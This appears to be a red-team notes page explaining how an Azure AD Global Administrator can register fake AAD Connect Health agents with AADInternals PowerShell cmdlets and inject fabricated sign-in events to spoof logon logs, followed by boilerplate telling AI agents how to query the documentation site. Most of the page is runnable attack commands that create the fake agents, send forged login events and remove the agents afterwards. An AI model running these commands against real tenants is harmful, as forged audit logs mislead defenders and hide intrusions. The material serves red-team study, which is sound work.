# Registering Fake Agents for Log Spoofing We talked about Spoofing AAD Logon logs as a ADFS administrator in [Spoofing Azure Sign-In Logs](https://otter.gitbook.io/red-teaming/notes/aad/spoofing-azure-sign-in-logs), now we'll see how it's possible to do the same as a Global Administrator on the AAD side. As a Global Admin we can register our own AAD Connect Health agent ```powershell PS /home/otter> New-AADIntHybridHealthService -DisplayName "minions.onmicrosoft.com" -Signature "minions.onmicrosoft.com" -Type AdFederationService ``` or register a new ADFS server ```powershell PS /home/otter> Register-AADIntHybridHealthServiceAgent -ServiceName AdFederationService-minons.onmicrosoft.com -MachineName "" -MachineRole AdfsServer_2016 ``` After this setup part we are, once again, free to generate fake login events ```powershell PS /home/otter> $events = @( >> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter1@minions.com" -IPAddress "1.1.1.1" -NetworkLocationType Extranet >> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter2@minions.com" -IPAddress "2.2.2.2" -NetworkLocationType Extranet >> ) PS /home/otter> Send-AADIntHybridHealthServiceEvents -AgentInfo $agentInfo -Events $events -Verbose ``` To remove the fake agents we created we can use ```powershell PS /home/otter> Remove-AADIntHybridHealthService -ServiceName "" ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://otter.gitbook.io/red-teaming/notes/aad/registering-fake-agents-for-log-spoofing.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.